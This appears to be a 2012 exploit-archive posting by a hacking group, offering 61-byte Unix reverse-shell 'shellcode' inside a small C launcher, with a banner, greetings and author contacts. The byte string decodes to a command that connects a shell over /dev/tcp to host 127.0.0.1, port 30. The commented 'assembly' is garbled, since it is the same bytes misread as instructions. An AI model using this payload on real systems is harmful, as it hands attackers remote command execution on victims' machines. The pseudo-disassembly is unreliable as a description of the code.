unix/x86 Backshell[/dev/tcp],Port(30) - 61 bytes Shellcode



EKU-ID: 2445 CVE: OSVDB-ID:
Author: KedAns-Dz Published: 2012-07-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
###
# Title : unix/x86 Backshell[/dev/tcp],Port(30) - 61 bytes Shellcode
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com * www.dis9.com
# platform : unix/x86 - Multiple
# Type : Shellc0de - 61 bytes
###

# <3 <3 Greetings t0 Palestine <3 <3
# Happy 50 Year's in Independence All Algerians <3 <3
*/

#include <stdio.h>
#include <string.h>

// UNIX Universal BackShell Reverse with /dev/tcp on port 30 - old but c00l ^_^

/*
xor %esi,%bh
xor dword $0x653b2d31 ,$esi
js short .me
0x2063
xor dword $0x3e3c31 ,%esi

/dev/tcp/127.0.0.1/30;sh

cmp %al, $0x26
xor dword $0x263e2031 ,%esi
xor dword $0x3e322031 ,%esi
xor dword $0x31 ,%esi
*/

char devsc[] =
"\x30\x3c\x26\x31\x35\x31\x2d\x3b\x65\x78\x65\x63\x20\x31\x35"
"\x31\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x31\x32\x37"
"\x2e\x30\x2e\x30\x2e\x31\x2f\x33\x30\x3b\x73\x68\x20\x3c\x26"
"\x31\x35\x31\x20\x3e\x26\x31\x35\x31\x20\x32\x3e\x26\x31\x35"
"\x31";

int main()
{
    int (*dz)() = (int(*)())devsc;
        printf("bytes: %u\n", strlen(devsc));
        dz();
}
/*
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke
# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Barbaros-DZ
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================*/